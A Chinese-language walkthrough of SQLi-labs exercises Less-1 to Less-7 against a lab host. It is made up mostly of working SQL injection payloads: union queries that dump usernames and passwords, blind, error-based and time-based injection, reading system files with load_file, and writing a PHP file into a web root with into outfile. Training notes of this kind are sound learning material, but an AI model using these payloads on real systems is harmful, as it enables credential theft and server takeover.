less-1 ~ less4 基础注入
基础的注入,直接回显数据库查询内容,可用常规思路进行注入
用到的注入语句如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
| # 查询列数
http://192.168.100.51/sql/Less-1/?id=1%27+order+by+3--+
# 回显查询列对应的位置,union查询需要前半部分查出来为NULL才会显示后半段内容,所以id要为-1
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,2,3--+
# 查库
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(schema_name),3+from+information_schema.schemata--+
# 查表
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=%27security%27--+
# 查列
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=%27users%27--+
# 查数据
http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
|
Less1 字符型注入
1
| http://192.168.100.51/sql/Less-1/?id=-1%27+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
|
less2 数字型注入
1
| http://192.168.100.51/sql/Less-2/?id=-1+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
|
Less3
1
| http://192.168.100.51/sql/Less-3/?id=-1%27)+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
|
less4
1
| http://192.168.100.51/sql/Less-4/?id=1%22)+and+1=2+union+select+1,group_concat(username,password),3+from+users+where+id=1--+
|
less5~less6 盲注
盲注常用到的函数:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # left(a,b)函数,取a的前b位
left(user(),1)
# substr从b位置开始,取a的前c位
substr(a,b,c)
# ascii将字符转换为ascii码的形式
ascii('a')
# mid函数从b位置开始截取a字符的c位,与substr作用相同
mid(a,b,c)
# ord函数同ascii函数一样,将字符转换为ascii码值
ord('a')
ascii(substr(select user(),1,1))=98
# if判断语句:if(a,b,c),如果a为真,返回b,否则返回c
if((user() regexp '^ro'), 0, 1)
|
regexp正则注入
用法:
匹配到结果返回true,否则返回false
select user() regexp '^ro':匹配查询结果是root,结果正确的时候为真,否则为假
注入语句:select * from users where id=1 and 1=(user() regexp '^ro')
like匹配注入
用法:
查询到结果返回true,否则返回false
1
| select user() like 'ro%'
|
注入语句:
select * from usres where id =1 and 1=(user() like 'ro%')
报错注入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
# floor报错
Select 1,count(*),concat(0x3a,0x3a,(select user()),0 x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+
# xpath注入
extractvalue(1,concat(0x7e,(select%20user()),0x7e))%20--+
updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)%20--+
# bigint 溢出
union select (!(select * from (select user())x) - ~0),2,3- -+
# double 数值类型超出范围
union select (exp(~(select * FROM(SELECT USER())))),2, 3--+
# 数据重复性
union%20select%201,2,3%20from%20(select%20NAME_CONST(version(),1),%20NAME_CONST(version(),1))x%20--+
|
延时注入
1
2
3
4
5
6
7
| # sleep延时注入
If(ascii(substr(database(),1,1))=116,1,sleep(3))--+
# benchmark延时注入
If(ascii(substr(database(),1,1))=116,1,BENCHMARK(50000000,ENCODE(%27MSG%27,%27by%205%20seconds%27)))--+
|
less7 导出
load_file()导出文件
load_file(file_name)
**使用条件: **
- 必须拥有权限,并且文件可读,可通过
and (select count(*) from mysql.user)>0,如果 返回正常,则有读写权限
- 必须指定文件的绝对路径
- 文件必须小于
max_allowed_packet
常见用法:
1
2
3
4
5
6
7
8
9
| 1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) Explain:“char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的 ASCII 代码
-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
Explain:“c:/boot.ini”的 16 进制是“0x633a2f626f6f742e696e69”
-1 union select 1,1,1,load_file(c:\\boot.ini)
Explain:路径里的/用 \\代替
|
select into outfile 写文件
- 直接写入文件
Select version() into outfile “c:\\phpnow\\htdocs\\test.php”
- 写入文件尾
Select version() Into outfile “c:\\phpnow\\htdocs\\test.php” LINES TERMINATED BY 0x16进制文件
参考文档
1、《mysql注入天书》